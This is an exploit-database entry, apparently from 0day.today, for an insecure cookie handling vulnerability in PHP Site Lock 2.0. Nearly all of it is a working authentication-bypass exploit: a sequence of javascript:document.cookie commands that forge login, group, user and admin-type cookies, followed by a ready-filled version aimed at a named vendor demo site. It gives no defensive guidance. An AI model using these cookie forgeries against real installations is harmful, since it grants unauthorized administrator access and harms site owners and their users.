PHP Site Lock 2.0 Insecure Cookie Handling Vulnerability

2009-05-04T00:00:00
ID 1337DAY-ID-5132
Type zdt
Reporter ThE g0bL!N
Modified 2009-05-04T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================
PHP Site Lock 2.0 Insecure Cookie Handling Vulnerability
========================================================


-------------------------------------
PHP Site Lock 2.0 Insecure Cookie Handling Vuln
-------------------------------------
Exploit:
--------
1)javascript:document.cookie="login_id=0;path=/";
1)javascript:document.cookie="group_id=[id grroup admin];path=/";
2)javascript:document.cookie="login_name=[admin name];path=/";
3)javascript:document.cookie="user_id=[user id ];path=/";
4)javascript:document.cookie="user_type=[admin Type];path=/";
Then Go to url: http://victim/[path]/index.php

demo
----
http://www.kalptarudemos.com/demo/phpsitelock/index.php?page=adminlogin

exploit for dem0
----------------
1)javascript:document.cookie="login_id=0;path=/";
2)javascript:document.cookie="group_id=1;path=/";
3)javascript:document.cookie="login_name=admin;path=/";
4)javascript:document.cookie="user_id=1;path=/";
5)javascript:document.cookie="user_type=admin;path=/";


Note: The operation is not worked by assemble The Information :)
Put it one after one :)
--------------------------------------------------



#  0day.today [2018-02-17]  #